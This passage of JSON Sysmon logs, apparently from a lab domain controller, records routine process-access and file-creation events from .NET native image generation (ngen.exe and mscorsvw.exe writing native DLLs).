C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:57.554","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2265-5F25-0000-001061680E00}","TargetProcessId":"1480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7648,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:57.554\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2265-5F25-0000-001061680E00}\r\nTargetProcessId: 1480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:57.554","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2265-5F25-0000-001061680E00}","TargetProcessId":"1480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7649,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:01.304\r\nProcessGuid: {41C8662E-2265-5F25-0000-001061680E00}\r\nProcessId: 1480\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\5c8-0\\System.Activities.Presentation.dll\r\nCreationUtcTime: 2020-08-01 08:06:01.304","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:01.304","ProcessGuid":"{41C8662E-2265-5F25-0000-001061680E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\5c8-0\\System.Activities.Presentation.dll","CreationUtcTime":"2020-08-01 08:06:01.304","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7650,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:01.413\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2269-5F25-0000-00101F710E00}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:01.413","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2269-5F25-0000-00101F710E00}","TargetProcessId":"3816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7651,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:01.413\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2269-5F25-0000-00101F710E00}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:01.413","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2269-5F25-0000-00101F710E00}","TargetProcessId":"3816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7652,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:01.413\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2269-5F25-0000-00101F710E00}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:01.413","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2269-5F25-0000-00101F710E00}","TargetProcessId":"3816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7653,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:01.460\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2269-5F25-0000-001085740E00}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:01.460","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2269-5F25-0000-001085740E00}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7654,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:01.460\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2269-5F25-0000-001085740E00}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:01.460","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2269-5F25-0000-001085740E00}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7655,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:01.475\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2269-5F25-0000-001085740E00}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:01.475","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2269-5F25-0000-001085740E00}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7656,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:01.929\r\nProcessGuid: {41C8662E-2269-5F25-0000-001085740E00}\r\nProcessId: 1348\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\544-0\\System.AddIn.dll\r\nCreationUtcTime: 2020-08-01 08:06:01.929","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:01.929","ProcessGuid":"{41C8662E-2269-5F25-0000-001085740E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\544-0\\System.AddIn.dll","CreationUtcTime":"2020-08-01 08:06:01.929","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
